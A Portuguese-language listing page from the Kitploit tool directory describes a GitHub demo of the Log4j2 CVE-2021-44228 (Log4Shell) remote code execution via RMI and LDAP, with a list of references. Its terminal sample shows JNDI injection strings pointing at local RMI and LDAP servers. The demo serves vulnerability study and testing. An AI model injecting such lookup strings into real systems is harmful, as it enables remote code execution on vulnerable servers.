Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-44228-Demo — Apache Log4j2 CVE-2021-44228 Demonstração de RCE com RMI e LDAP | Kitploit
Ferramentas/GitHubGitHub/mzlogin/cve-2021-44228-demo
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubmzlogin/cve-2021-44228-demo

CVE-2021-44228-Demo

Apache Log4j2 CVE-2021-44228 Demonstração de RCE com RMI e LDAP

Ver Repositório
23há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-44228-Demo

Um exemplo de injeção remota de código usando CVE-2021-44228 via RMI e LDAP.

root@kitploit:~
Exploit class from RMI Server loaded
Hello, ${jndi:rmi://127.0.0.1:1099/exploit}
Exploit class from LDAP Server loaded
Hello, ${jndi:ldap://127.0.0.1:1389/org.mazhuang.ldap.Exploit}

RmiServer e LdapServer dependem do Python3 para iniciar.

Referências

  • Reprodução da vulnerabilidade de execução remota de código do Apache Log4j2
  • Vulnerabilidade crítica do Log4j! Análise específica das causas! Primeira em toda a rede! e Vulnerabilidade crítica do Log4j (Vídeo complementar)
  • Log4j Lookups
  • Apache Log4j2: Do RCE ao bypass do RC1
  • tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce
  • PSA: Log4Shell and the current state of JNDI injection
Baixar ferramenta